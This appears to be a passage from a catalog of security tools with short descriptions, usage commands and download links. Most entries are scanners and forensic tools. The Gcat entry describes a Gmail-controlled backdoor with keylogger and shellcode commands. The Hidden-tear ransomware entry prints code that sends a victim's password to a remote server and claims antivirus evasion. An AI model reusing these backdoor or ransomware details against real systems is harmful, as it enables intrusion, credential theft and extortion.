-l <LogFile>, --log < LogFile >: It specifies the log file to
save the scan results. If not set, logs are saved in
flashlight.log file in working directory.
-k <PassiveTimeout>, --passive_timeout
<PassiveTimeout>: It specifies the timeout for sniffing in
passive mode. Default value is 15 seconds. This
parameter is used for passive scan.
-m, --mim: It is used to perform MITM attack.
-n, --nmap-optimize: It is used to optimize nmap scan.
-v, --verbose: It is used to list detailed information.
-V, --version: It specifies version of the program.
discover up IP addresses before the actual vulnerability
scan. It is used for active scan.
-g <DefaultGateway>, --gateway < DefaultGateway >: It
identifies the IP address of the gateway. If not set,
interface with -I parameter is chosen.
-l <LogFile>, --log < LogFile >: It specifies the log file to
save the scan results. If not set, logs are saved in
flashlight.log file in working directory.
-k <PassiveTimeout>, --passive_timeout
<PassiveTimeout>: It specifies the timeout for sniffing in
passive mode. Default value is 15 seconds. This
parameter is used for passive scan.
-m, --mim: It is used to perform MITM attack.
-n, --nmap-optimize: It is used to optimize nmap scan.
-v, --verbose: It is used to list detailed information.
-V, --version: It specifies version of the program.
VIDEOS :
https://www.youtube.com/watch?
v=EUMKffaAxzs&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=4 https://www.youtube.com/watch?
v=qCgW-SfYl1c&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=5 https://www.youtube.com/watch?
v=98Soe01swR8&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=6 https://www.youtube.com/watch?
v=9wft9zuh1f0&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=7
INSTALLATION
apt-get install nmap tshark tcpdump dsniff
In order to install phantomjs easily, you can download and

extract it from https://bitbucket.org/ariya/phantomjs/downloads.
Flashlight application can perform 3 basic scan types and 1
analysis type. Each of them are listed below.
1) PASSIVE SCAN
In passive scan, no packets are sent into wire. This type of
scan is used for listening network and analyzing packets.
To launch a passive scan by using Flashlight; a project name
should be specified like passive-pro-01. In the following
command, packets that are captured by eth0 are saved into /
root/Desktop/flashlight/output/passive-project-01/pcap"
directory, whereas, Pcap files and all logs are saved into "/root/
Desktop/log" directory.
./flashlight.py -s passive -p passive-pro-01 -i eth0 -o /
root/Desktop/flashlight_test -l /root/Desktop/log v
2) ACTIVE SCAN
During an active scan, NMAP scripts are used by reading the
configuration file. An example configuration file (flashlight.yaml)
is stored in config directory under the working directory.
tcp_ports:
- 21, 22, 23, 25, 80, 443, 445, 3128, 8080
udp_ports:
- 53, 161
scripts:
- http-enum
According to "flashlight.yaml" configuration file, the scan

executes against "21, 22, 23, 25, 80, 443, 445, 3128, 8080"
TCP ports, "53, 161" UDP ports, "http-enum" script by using
NMAP.
Note: During active scan screen_ports option is useless. This
option just works with screen scan.
-a option is useful to discover up hosts by sending ICMP
packets. Beside this, incrementing thread number by using -t
parameter increases scan speed.
./flashlight.py -p active-project -s active -d
192.168.74.0/24 t 30 -a -v
By running this command; output files in three different formats

(Normal, XML and Grepable) are emitted for four different scan
types (Operating system scan, Ping scan, Port scan and Script
Scan).
The example commands that Flashlight Application runs can be
given like so:
Operating System Scan: /usr/bin/nmap -n -Pn -O -T5 -iL /

tmp/"IPListFile" -oA /root/Desktop/flashlight/output/activeproject/nmap/OsScan-"Date"
Ping Scan: /usr/bin/nmap -n -sn -T5 -iL /tmp/"IPListFile" oA /root/Desktop/flashlight/output/active-project/nmap/
PingScan-"Date"
Port Scan: /usr/bin/nmap -n -Pn -T5 --open -iL /
tmp/"IPListFile" -sS -p T:
21,22,23,25,80,443,445,3128,8080,U:53,161 -sU -oA /
root/Desktop/flashlight/output/active-project/nmap/
PortScan-"Date"
Script Scan: /usr/bin/nmap -n -Pn -T5 -iL /tmp/"IPListFile" sS -p T:21,22,23,25,80,443,445,3128,8080,U:53,161 -sU
--script=default,http-enum -oA /root/Desktop/flashlight/
output/active-project/nmap/ScriptScan-"Date"
3) SCREEN SCAN
Screen Scan is used to get screenshots of web sites/
applications by using directives in config file (flashlight.yaml).
Directives in this file provide screen scan for four ports ("80,
443, 8080, 8443") screen_ports: - 80, 443, 8080, 8443 Sample
screen scan can be performed like this: ``` ./flashlight.py -p
project -s screen -d 192.168.74.0/24 -r /usr/local/rasterize.js -t
10 -v ```
4) FILTERING
Filtering option is used to analyse pcap files. An example for
this option is shown below: ``` ./flashlight.py -p filter-project -s
filter -f /root/Desktop/flashlight/output/passive-project-02/pcap/
20150815072543.pcap -v ``` By running this command some
files are created on filter sub-folder. This option analyzes
PCAP packets according to below properties:
Windows hosts
Top 10 DNS requests
...
DownloadFlashlight
FORPIX - SOFTWARE FOR DETECTING AFFINE IMAGE
FILES
forpix is a forensic program for identifying similar images that

are no longer identical due to image manipulation. Hereinafter I
will describe the technical background for the basic
understanding of the need for such a program and how it
works.
From image files or files in general you can create so-called
cryptologic hash values, which represent a kind of fingerprint of
the file. In practice, these values have the characteristic of
being unique. Therefore, if a hash value for a given image is
known, the image can be uniquely identified in a large amount
of other images by the hash value. The advantage of this fully
automated procedure is that the semantic perception of the
image content by a human is not required. This methodology is
an integral and fundamental component of an effective forensic
investigation.
Due to the avalanche effect, which is a necessary feature of
cryptologic hash functions, a minimum -for a human not to be
recognized- change of the image causes a drastic change of
the hash value. Although the original image and the
manipulated image are almost identical, this will not apply to
the hash values any more. Therefore the above mentioned
application for identification is ineffective in the case of similar
images.
A method was applied that resolves the ineffectiveness of
cryptologic hash values. It uses the fact that an offender is
interested to preserve certain image content. In some degree,
this will preserve the contrast as well as the color and
frequency distribution. The method provides three algorithms to
generate robust hash values of the mentioned image features.
In case of a manipulation of the image, the hash values change
either not at all or only moderately similar to the degree of
manipulation. By comparing the hash values of a known image
with those of a large quantity of other images, similar images

can now be recognized fully automated.
Download Forpix
FRUITYWIFI V2.2 - WIRELESS NETWORK AUDITING TOOL
FruityWifi is an open source tool to audit wireless networks. It

allows the user to deploy advanced attacks by directly using the
web interface or by sending messages to it.
Initialy the application was created to be used with the
Raspberry-Pi, but it can be installed on any Debian based

system.
FruityWifi v2.0 has many upgrades. A new interface, new
modules, Realtek chipsets support, Mobile Broadband (3G/4G)
support, a new control panel, and more.
A more flexible control panel. Now it is possible to use

FruityWifi combining multiple networks and setups:
- Ethernet
Ethernet,
- Ethernet
3G/4G,
- Ethernet
Wifi,
- Wifi
Wifi,
- Wifi
3G/4G, etc.
Within the new options on the control panel we can change the
AP mode between Hostapd or Airmon-ng allowing to use more
chipsets like Realtek.
It is possible customize each one of the network interfaces
which allows the user to keep the current setup or change it
completely.
Changelog
v2.2
v2.1
Wireless service has been replaced by AP module

Mobile support has been added
Bootstrap support has been added
Token auth has been added
minor fix
Hostapd Mana support has been added
Phishing service has been replaced by phishing module
Karma service has been replaced by karma module
Sudo has been implemented (replacement for danger)
Logs path can be changed
Squid dependencies have been removed from FruityWifi
installer
Phishing dependencies have been removed from
FruityWifi installer
New AP options available: hostapd, hostapd-mana,
hostapd-karma, airmon-ng
Domain name can be changed from config panel

New install options have been added to installFruityWifi.sh
Install/Remove have been updated
DownloadFruityWifi
FTPMAP - FTP SCANNER IN C
Ftpmap scans remote FTP servers to indentify what software

and what versions they are running. It uses program-specific
fingerprints to discover the name of the software even when
banners have been changed or removed, or when some
features have been disabled. also FTP-Map can detect
Vulnerables by the FTP software/version.
COMPILATION
./configure
make
make install
Using ftpmap is trivial, and the built-in help is self-explanatory :

Examples :
ftpmap -s ftp.c9x.org
ftpmap -P 2121 -s 127.0.0.1
ftpmap -u joe -p joepass -s ftp3.c9x.org
If a named host has several IP addresses, they are all

sequentially scanned. During the scan, ftpmap displays a list of
numbers : this is the "fingerprint" of the server.
Another indication that can be displayed if login was successful
is the FTP PORT sequence prediction. If the difficulty is too
low, it means that anyone can steal your files and change their
content, even without knowing your password or sniffing your
network.
There are very few known fingerprints yet, but submissions are
welcome.
Obfuscating FTP servers
This software was written as a proof of concept that security

through obscurity doesn't work. Many system administrators
think that hidding or changing banners and messages in their
server software can improve security.
Don't trust this. Script kiddies are just ignoring banners. If they
read that "XYZ FTP software has a vulnerability", they will try
the exploit on all FTP servers they will find, whatever software
they are running. The same thing goes for free and commercial
vulnerability scanners. They are probing exploits to find
potential holes, and they just discard banners and messages.
On the other hand, removing software name and version is
confusing for the system administrator, who has no way to
quickly check what's installed on his servers.
If you want to sleep quietly, the best thing to do is to keep your
systems up to date : subscribe to mailing lists and apply vendor
patches.
Downloading Ftpmap
git clone git://github.com/Hypsurus/ftpmap
DownloadFTPMap
GCAT - A STEALTHY BACKDOOR THAT USES GMAIL AS
A COMMAND AND CONTROL SERVER
A stealthy Python based backdoor that uses Gmail as a

command and control server.
Setup
For this to work you need:

A Gmail account (Use a dedicated account! Do not use
your personal one!)
Turn on "Allow less secure apps" under the security
settings of the account
This repo contains two files:
gcat.py a script that's used to enumerate and issue
commands to available clients
implant.py the actual backdoor to deploy
In both files, edit the gmail_user and gmail_pwd variables with
the username and password of the account you previously
setup.
You're probably going to want to compile implant.py into an
executable using Pyinstaller
Usage
Gcat
optional arguments:
-h, --help
-v, --version
show program's version number and
exit
-id ID
Client to target
-jobid JOBID
Job id to retrieve
-list
List available clients
-info
Retrieve info on specified client
Commands:
Commands to execute on an implant
-cmd CMD
Execute a system command
-download PATH
Download a file from a clients
system
-exec-shellcode FILE
Execute supplied shellcode on a
client
-screenshot
Take a screenshot
-lock-screen
Lock the clients screen
-force-checkin
Force a check in
-start-keylogger
Start keylogger
-stop-keylogger
Stop keylogger
Once you've deployed the backdoor on a couple of

systems, you can check available clients using the list
command:
#~ python gcat.py -list

f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-
x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600SP3-x86
The output is a UUID string that uniquely identifies the system

and the OS the implant is running on
Let's issue a command to an implant:
#~ python gcat.py -id 90b2cd83cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
Here we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11

to execute ipconfig /all, the script then outputs the jobid
that we can use to retrieve the output of that command
Lets get the results!
#~ python gcat.py -id 90b2cd83cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe
implant.py'
CMD: 'ipconfig /all'
Windows IP Configuration
Host Name . . . . . . . . . . . . :
unknown-2d44b52
Primary Dns Suffix
. . . . . . . :
Node Type . . . . . . . . . . . . : Unknown

IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
-- SNIP --
That's the gist of it! But you can do much more as you can
see from the usage of the script! ;)
Download Gcat
GEOTWEET - SOCIAL ENGINEERING TOOL FOR HUMAN
HACKING
Another way to use Twitter and instagram. Geotweet is an osint

application that allows you to track tweets and instagram and
trace geographical locations and then export to google maps.
Allows you to search on tags, world zones and user (info and
timeline).
Requirements
Python 2.7
PyQt4, tweepy, geopy, ca_certs_locater, pythoninstagram
Works on Linux, Windows, Mac OSX, BSD
Installation
git clone https://github.com/Pinperepette/
Geotweet_GUI.git
cd Geotweet_GUI
chmode +x Geotweet.py
sudo apt-get install python-pip
sudo pip install tweepy
sudo pip install geopy
sudo pip install ca_certs_locater
sudo pip install python-instagram
python ./Geotweet.py
Video
An error occurred.
Download Geotweet
GETHEAD - HTTP HEADER ANALYSIS VULNERABILITY
TOOL
gethead.py is a Python HTTP Header Analysis Vulnerability

Tool. It identifies security vulnerabilities and the lack of
protection in HTTP Headers.
Usage:
$ python gethead.py http://domain.com
Changelog
Version 0.1 - Initial Release

Written in Python 2.7.5
Performs HTTP Header Analysis
Reports Header Vulnerabilities
Features in Development
Version 0.2 - Next Release (April 2014 Release)

Support for git updates
Support for Python 3.3
Complete Header Analysis
Additional Logic for Severity Classifications
Rank Vulnerabilities by Severity
Export Findings with Description, Impact, Execution, Fix,
and References
Export with multi-format options (XML, HTML, TXT)
Version 0.3 - Future Release (May 2014 Release)
Replay and Inline Upstream Proxy support to import into
other tools
Scan domains, sub-domains, and multi-services
Header Injection and Fuzzing functionality
HTTP Header Policy Bypassing
Modularize and port to more platforms
(e.g. gMinor, Kali, Burp Extension, Metasploit, Chrome,
Firefox)
DownloadGetHead
GHIRO 0.2 - AUTOMATED DIGITAL IMAGE FORENSICS
TOOL
Sometime forensic investigators need to process digital images

as evidence. There are some tools around, otherwise it is
difficult to deal with forensic analysis with lot of images
involved.
Images contain tons of information, Ghiro extracts these
information from provided images and display them in a nicely
formatted report.
Dealing with tons of images is pretty easy, Ghiro is designed to
scale to support gigs of images.
All tasks are totally automated, you have just to upload you
images and let Ghiro does the work.
Understandable reports, and great search capabilities allows
you to find a needle in a haystack.
Ghiro is a multi user environment, different permissions can be
assigned to each user. Cases allow you to group image
analysis by topic, you can choose which user allow to see your
case with a permission schema.
Use Cases
Ghiro can be used in many scenarios, forensic investigators

could use it on daily basis in their analysis lab but also people
interested to undercover secrets hidden in images could
benefit. Some use case examples are the following:
If you need to extract all data and metadata hidden in an
image in a fully automated way
If you need to analyze a lot of images and you have not
much time to read the report for all them
If you need to search a bunch of images for some
metadata
If you need to geolocate a bunch of images and see them
in a map
If you have an hash list of "special" images and you want
to search for them
Anyway Ghiro is designed to be used in many other scenarios,
the imagination is the only limit.
Video
An error occurred.
MAIN FEATURES
Metadata extraction
Metadata are divided in several categories depending on the
standard they come from. Image metadata are extracted and
categorized. For example: EXIF, IPTC, XMP.
GPS Localization
Embedded in the image metadata sometimes there is a geotag,
a bit of GPS data providing the longitude and latitude of where

the photo was taken, it is read and the position is displayed on
a map.
MIME information
The image MIME type is detected to know the image type your
are dealing with, in both contacted (example: image/jpeg) and
extended form.
Error Level Analysis
Error Level Analysis (ELA) identifies areas within an image that
are at different compression levels. The entire picture should be
at roughly the same level, if a difference is detected, then it
likely indicates a digital modification.
Thumbnail extraction
The thumbnails and data related to them are extracted from
image metadata and stored for review.
Thumbnail consistency
Sometimes when a photo is edited, the original image is edited
but the thumbnail not. Difference between the thumbnails and
the images are detected.
Signature engine
Over 120 signatures provide evidence about most critical data
to highlight focal points and common exposures.
Hash matching
Suppose you are searching for an image and you have only the
hash. You can provide a list of hashes and all images matching
are reported.
DownloadGhiro
GITROB - RECONNAISSANCE TOOL FOR GITHUB
ORGANIZATIONS
Gitrob is a command line tool that can help organizations and

security professionals find such sensitive information. The tool
will iterate over all public organization and member repositories
and match filenames against a range of patterns for files, that
typically contain sensitive or dangerous information.
How it works
Looking for sensitive information in GitHub repositories is not a

new thing, it has been known for a while that things such as
private keys and credentials can be found with GitHub's search
functionality, however Gitrob makes it easier to focus the effort
on a specific organization.
The first thing the tool does is to collect all public repositories of
the organization itself. It then goes on to collect all the
organization members and their public repositories, in order to
compile a list of repositories that might be related or have
relevance to the organization.
When the list of repositories has been compiled, it proceeds to
gather all the filenames in each repository and runs them
through a series of observers that will flag the files, if they
match any patterns of known sensitive files. This step might
take a while if the organization is big or if the members have a
lot of public repositories.
All of the members, repositories and files will be saved to a
PostgreSQL database. When everything has been sifted
through, it will start a Sinatra web server locally on the
machine, which will serve a simple web application to present
the collected data for analysis.
DownloadGitrob
GOACCESS - REAL-TIME WEB LOG ANALYZER AND
INTERACTIVE VIEWER
GoAccess is an open source real-time web log analyzer and

interactive viewer that runs in a terminal in *nix systems. It
provides fast and valuable HTTP statistics for system
administrators that require a visual server report on the fly.
Features
GoAccess parses the specified web log file and outputs the
data to the X terminal.
General statistics, bandwidth, etc.
Time taken to serve the request (useful to track pages that
are slowing down your site)
Top visitors
Requested files & static files
404 or Not Found
Hosts, Reverse DNS, IP Location

Operating Systems
Browsers and Spiders
Referring Sites & URLs
Keyphrases
Geo Location - Continent/Country/City
Visitors Time Distribution New
HTTP Status Codes
Ability to output JSON and CSV
Different Color Schemes
Support for large datasets + data persistence
Support for IPv6
Output statistics to HTML. See report
and more...
GoAccess allows any custom log format string. Predefined
options include, but not limited to:
Amazon CloudFront (Download Distribution).
Apache/Nginx Common/Combined + VHosts
W3C format (IIS)
Why GoAccess?
The main idea behind GoAccess is being able to quickly

analyze and view web server statistics in real time without
having to generate an HTML report. Although it is possible to
generate an HTML, JSON, CSV report, by default it outputs to a
terminal.
You can see it more as a monitor command tool than anything
else.
Download GoAccess
GPING - PING, BUT WITH A GRAPH
Ping, but with a graph

Install and run
Created/tested with Python 3.4, should run on 2.7 (will require

the statistics module though).
pip3 install pinggraph
Tested on Windows and Ubuntu, should run on OS X as well.

After installation just run:
gping [yourhost]
If you don't give a host then it pings google.

Why?
My apartments internet is all 4g, and while it's normally pretty

fast it can be a bit flakey. I often found myself running ping -t
google.com in a command window to get a rough idea of the
network speed, and I thought a graph would be a great way to
visualize the data. I still wanted to just use the command line
though, so I decided to try and write a cross platform one that I
could use. And here we are.
Code
For a quick hack the code started off really nice, but after I
decided pretty colors were a good addition it quickly got rather
complicated. Inside pinger.py is a function plot() , this uses a
canvas-like object to "draw" things like lines and boxes to the
screen. I found on Windows that changing the colors is slow
and caused the screen to flicker, so theres a big mess of a
function called process_colors to try and optimize that. Don't
ask.
Download Gping
GRAUDIT - FIND POTENTIAL SECURITY FLAWS IN
SOURCE CODE USING GREP
Graudit is a simple script and signature sets that allows you to

find potential security flaws in source code using the GNU utility
grep. It's comparable to other static analysis applications like
RATS, SWAAT and flaw-finder while keeping the technical
requirements to a minimum and being very flexible.
Who should use graudit?
System administrators, developers, auditors, vulnerability
researchers and anyone else that cares to know if the
application they develop, deploy or otherwise use is secure.
What languages are supported?
ASP
JSP
Perl
PHP
Python
Other (looks for suspicious comments, etc)
USAGE
Graudit supports several options and tries to follow good shell

practices. For a list of the options you can run graudit -h or see
below. The simplest way to use graudit is;
graudit /path/to/scan
DEPENDENCIES
Required: bash, grep, sed

The following options are available:
-A scan ALL files
-c
number of lines of context to display, default is 2
-d
database to use
-h prints a short help text

-i case in-sensitive search
-l lists databases available
-L vim friendly lines
-v prints version number
-x exclude these files
-z supress colors
-Z high contrast colors
Download Graudit
GRINDER - SYSTEM TO AUTOMATE THE FUZZING OF
WEB BROWSERS
Grinder is a system to automate the fuzzing of web browsers

and the management of a large number of crashes. Grinder
Nodes provide an automated way to fuzz a browser, and
generate useful crash information (such as call stacks with
symbol information as well as logging information which can be
used to generate reproducible test cases at a later stage). A
Grinder Server provides a central location to collate crashes
and, through a web interface, allows multiple users to login and

manage all the crashes being generated by all of the Grinder
Nodes.
System Requirements
A Grinder Node requires a 32/64 bit Windows system and Ruby

2.0 (Ruby 1.9 is also supported but you wont be able to fuzz
64bit targets).
A Grinder Server requires a web server with MySQL and PHP.
Features
Grinder Server features:

Multi user web application. User can login and manage all
crashes reported by the Grinder Nodes. Administrators
can create more users and view the login history.
Users can view the status of the Grinder system. The
activity of all nodes in the system is shown including
status information such as average testcases being run
per minute, the total crashes a node has generated and
the last time a node generated a crash.
Users can view all of the crashes in the system and sort
them by node, target, fuzzer, type, hash, time or count.
Users can view crash statistics for the fuzzers, including
total and unique crashes per fuzzer and the targets each
fuzzer is generating crashes on.
Users can hide all duplicate crashes so as to only show
unique crashes in the system in order to easily manage
new crashes as they occur.
Users can assign crashes to one another as well as mark
a particular crash as interesting, exploitable, uninteresting
or unknown.
Users can store written notes for a particular crash
(viewable to all other users) to help manage them.
Users can download individual crash log files to help
debug and recreate testcases.

Users can create custom filters to exclude uninteresting
crashes from the list of crashes.
Users can create custom e-mail alerts to alert them when
a new crash comes into the system that matches a
specific criteria.
Users can change their password and e-mail address on
the system as well as view their own login history.
Grinder Node features:
A node can be brought up and begin fuzzing any
supported browser via a single command.
A node injects a logging DLL into the target browser
process to help the fuzzers perform logging in order to
recreate testcases at a later stage.
A node records useful crash information such as call
stack, stack dump, code dump and register info and also
includes any available symbol information.
A node can automatically encrypt all crash information
with an RSA public key.
A node can automatically report new crashes to a remote
Grinder Server.
A node can run largely unattended for a long period of
time.
Grinder Screenshots
DownloadGrinder
GRYFFIN - LARGE SCALE WEB SECURITY SCANNING
PLATFORM
Gryffin is a large scale web security scanning platform. It is not

yet another scanner. It was written to solve two specific
problems with existing scanners: coverage and scale.
Better coverage translates to fewer false negatives. Inherent
scalability translates to capability of scanning, and supporting a
large elastic application infrastructure. Simply put, the ability to
scan 1000 applications today to 100,000 applications tomorrow
by straightforward horizontal scaling.
Coverage
Coverage has two dimensions - one during crawl and the other
during fuzzing. In crawl phase, coverage implies being able to
find as much of the application footprint. In scan phase, or while
fuzzing, it implies being able to test each part of the application
for an applied set of vulnerabilities in a deep.
Crawl Coverage
Today a large number of web applications are template-driven,
meaning the same code or path generates millions of URLs.
For a security scanner, it just needs one of the millions of URLs
generated by the same code or path. Gryffin's crawler does just
that.
Page Deduplication
At the heart of Gryffin is a deduplication engine that compares
a new page with already seen pages. If the HTML structure of
the new page is similar to those already seen, it is classified as
a duplicate and not crawled further.
DOM Rendering and Navigation

A large number of applications today are rich applications. They
are heavily driven by client-side JavaScript. In order to discover
links and code paths in such applications, Gryffin's crawler
uses PhantomJS for DOM rendering and navigation.
Scan Coverage
As Gryffin is a scanning platform, not a scanner, it does not
have its own fuzzer modules, even for fuzzing common web
vulnerabilities like XSS and SQL Injection.
It's not wise to reinvent the wheel where you do not have to.
Gryffin at production scale at Yahoo uses open source and
custom fuzzers. Some of these custom fuzzers might be open
sourced in the future, and might or might not be part of the
Gryffin repository.
For demonstration purposes, Gryffin comes integrated with
sqlmap and arachni. It does not endorse them or any other
scanner in particular.
The philosophy is to improve scan coverage by being able to
fuzz for just what you need.
Scale
While Gryffin is available as a standalone package, it's primarily
built for scale.
Gryffin is built on the publisher-subscriber model. Each
component is either a publisher, or a subscriber, or both. This
allows Gryffin to scale horizontally by simply adding more
subscriber or publisher nodes.
Operating Gryffin
Pre-requisites
1. Go
2. PhantomJS, v2
3. Sqlmap (for fuzzing SQLi)
4. Arachni (for fuzzing XSS and web vulnerabilities)

5. NSQ ,
running lookupd at port 4160,4161
running nsqd at port 4150,4151
with --max-msg-size=5000000
6. Kibana and Elastic search, for dashboarding
listening to JSON over port 5000
Preconfigured docker image available in https://
hub.docker.com/r/yukinying/elk/
Installation
go get github.com/yahoo/gryffin/...
Run
TODO
1.
2.
3.
4.
5.
6.
7.
Mobile browser user agent

Preconfigured docker images
Redis for sharing states across machines
Instruction to run gryffin (distributed or standalone)
Documentation for html-distance
Implement a JSON serializable cookiejar.
Identify duplicate url patterns based on simhash result.
DownloadGryffin
HEARTBLEED VULNERABILITY SCANNER - NETWORK
SCANNER FOR OPENSSL MEMORY LEAK
(CVE-2014-0160)
Heartbleed Vulnerability Scanner is a multiprotocol (HTTP,

IMAP, SMTP, POP) CVE-2014-0160 scanning and automatic
exploitation tool written with python.
For scanning wide ranges automatically, you can provide a
network range in CIDR notation and an output file to dump the
memory of vulnerable system to check after.

Hearbleed Vulnerability Scanner can also get targets from a list
file. This is useful if you already have a list of systems using
SSL services such as HTTPS, POP3S, SMTPS or IMAPS.
git clone https://github.com/hybridus/
heartbleedscanner.git
Sample usage
To scan your local 192.168.1.0/24 network for heartbleed

vulnerability (https/443) and save the leaks into a file:
python heartbleedscan.py -n 192.168.1.0/24 -f
localscan.txt -r
To scan the same network against SMTP Over SSL/TLS and

randomize the IP addresses
python heartbleedscan.py -n 192.168.1.0/24 -p 25 -s SMTP
-r
If you already have a target list which you created by using

nmap/zmap
python heartbleedscan.py -i targetlist.txt
Dependencies
Before using Heartbleed Vulnerability Scanner, you should

installpython-netaddrpackage.
CentOS or CentOS-like systems :
yum install python-netaddr
Ubuntu or Debian-like systems :

apt-get insall python-netaddr
Download Heartbleed Vulnerability Scanner

HIDDEN-TEAR - AN OPEN SOURCE RANSOMWARE-LIKE
FILE CRYPTER
| |
(_)
| |
| |
| |
| |__
__| | __| | ___ _ __
| '_ \| |/ _` |/ _` |/ _ \ '_ \
| | | | | (_| | (_| |
| |_ ___
| __/ _ \/ _` | '__|
__/ | | | | ||
|_| |_|_|\__,_|\__,_|\___|_| |_|
__ _ _ __
__/ (_| | |
\__\___|\__,_|_|
It's a ransomware-like file crypter sample which can be

modified for specific purposes.
Features
Uses AES algorithm to encrypt files.

Sends encryption key to a server.
Encrypted files can be decrypt in decrypter program with
encryption key.
Creates a text file in Desktop with given message.
Small file size (12 KB)
Doesn't detected to antivirus programs (15/08/2015) http://
nodistribute.com/result/6a4jDwi83Fzt
Demonstration Video
An error occurred.
Usage
You need to have a web server which supports scripting
languages like php,python etc. Change this line with your

URL. (You better use Https connection to avoid
eavesdropping)
string targetURL = "https://www.example.com/
hidden-tear/write.php?info=";
The script should writes the GET parameter to a text file.

Sending process running in SendPassword() function
string info = computerName + "-" + userName + " " +
password;
var fullUrl = targetURL + info;
var conent = new

System.Net.WebClient().DownloadString(fullUrl);
Target file extensions can be change. Default list:
var validExtensions = new[]{".txt", ".doc", ".docx",

".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png",
".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx",
".html", ".xml", ".psd"};
Legal Warning
While this may be helpful for some, there are significant risks.
hidden tear may be used only for Educational Purposes. Do not
use it as a ransomware! You could go to jail on obstruction of
justice charges just for running hidden tear, even though you
are innocent.
DownloadHidden-tear
HOOK ANALYSER 3.2 - MALWARE ANALYSIS TOOL
Hook Analyser is a freeware application which allows an

investigator/analyst to perform static & run-time / dynamic
analysis of suspicious applications, also gather (analyse & corelated) threat intelligence related information (or data) from
various open sources on the Internet.
Essentially its a malware analysis tool that has evolved to add

some cyber threat intelligence features & mapping.
Hook Analyser is perhaps the only free software in the market
which combines analysis of malware analysis and cyber threat
intelligence capabilities. The software has been used by major
Fortune 500 organisations.
Features/Functionality
Spawn and Hook to Application Enables you to spawn

an application, and hook into it
Hook to a specific running process Allows you to hook to
a running (active) process
Static Malware Analysis Scans PE/Windows
executables to identify potential malware traces
Application crash analysis Allows you to analyse
memory content when an application crashes
Exe extractor This module essentially extracts
executables from running process/s
Release
On this releases, significant improvements and capabilities

have been added to the Threat Intelligence module.
Following are the key improvements and enhanced features
The malware analysis module has been improved - and

new signatures have been added
Cyber Threat Intelligence module IP Intelligence module (Analyse multiple IP
addresses instead of just 1!). Sample output
Keyword Intelligence module (Analyse keywords e.g.

Internet Explorer 11, IP address, Hash etc). Sample
output -
Network file (PCAP) analysis - Analyse userprovided .PCAP file and performs analysis on
external IP addresses. Example
Social Intelligence (Pulls data from Twitter- for userdefined keywords and performs network analysis).
Example
Let's look at "HOW-TO-USE" of this releases (Cyber Threat

Intelligence) The tool can perform analysis via 2 methods - auto mode and
manual mode.
In the auto mode, the tool will use the following files for analysis
1. Channels.txt (Path: feeds->channels.txt): Specify the list of
the twitter related channels or keywords for monitoring. In
the Auto mode, the monitoring is performed for 2 minutes

only, however if you'd like to monitor indefinitely, please
select the manual mode.
Example
2. intelligence-ipdb.txt (Path: feeds->intelligence-ipdb.txt):

Specify the list of IP addresses you'd like to analyse. Yes,
you can provide as many IPs you'd like to.
Example
3. Keywords.txt (Path: feeds->Keywords.txt): Specify the list

of keywords you'd like to analyse. Yes, you can provide as
many keywords you'd like to.
Example
4. rssurl.txt (Path: feeds->rssurl.txt): Specify the RSS feeds
to fetch vulnerability-related information.

Example
5. url.txt (Path: feeds->url.txt): Specify the list of the URLs

from where tool will pull malicious IP addresses
information.
Example
Threat Intel module can be executed from

HookAnalyser3.2.exe (option #6) file or can be executed
directly through ThreatIntel.exe file. Refer to the following
screenshots -
In manual mode, you'd need to provide filename as an
argument. Example below -
Important note - The software shall only be used for "NONCOMMERCIAL" purposes. For commercial usage, written
permission from theAuthormust be obtained prior to use.
DownloadHook Analyser 3.2

HSECSCAN - A SECURITY SCANNER FOR HTTP
RESPONSE HEADERS
hsecscan
A security scanner for HTTP response headers.
Requirements
Python 2.x
Usage
$ ./hsecscan.py
usage: hsecscan.py [-h] [-P] [-p] [-u URL] [-R] [-U UserAgent]
[-d 'POST data'] [-x PROXY]

A security scanner for HTTP response headers.
optional arguments:
-h, --help
-P, --database
Print the entire response headers
database.
-p, --headers
Print only the enabled response
headers from database.

-u URL, --URL URL
The URL to be scanned.
-R, --redirect
Print redirect headers.
-U User-Agent, --useragent User-Agent

Set the User-Agent request header
(default: hsecscan).
-d 'POST data', --postdata 'POST data'
Set the POST data (between single
quotes) otherwise
will be a GET (example:
'{ "q":"query string",
"foo":"bar" }').
-x PROXY, --proxy PROXY
Set the proxy server (example:
192.168.1.1:8080).
Example
$ ./hsecscan.py -u https://google.com
>> RESPONSE INFO <<
URL: https://www.google.com.br/?gfe_rd=cr&ei=Qlg_VuWHqWX8QeHraH4DQ
Code: 200
Headers:
Date: Sun, 08 Nov 2015 14:12:18 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="This is not a P3P policy! See http://
www.google.com/support/accounts/bin/answer.py?
hl=en&answer=151657 for more info."
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie:
PREF=ID=1111111111111111:FF=0:TM=1446991938:LM=1446991938
:V=1:S=wT722CJeTI8DR-6b; expires=Thu, 31-Dec-2015
16:02:17 GMT; path=/; domain=.google.com.br
Set-Cookie:
NID=73=IQTBy8sF0rXq3cu2hb3JHIYqEarBeft7Ciio6uPF2gChn2tj34
-kRocXzBwPb6-BLABp0grZvHf7LQnRQ9Z_YhGgztoFrns3BMSIGoGn4BWBA48UtsFw4OsB5RZ4ODz1rZb9XjCYemyZw7e5ZJ5
pWftv5DPul0; expires=Mon, 09-May-2016 14:12:18 GMT;
path=/; domain=.google.com.br; HttpOnly
Alternate-Protocol: 443:quic,p=1
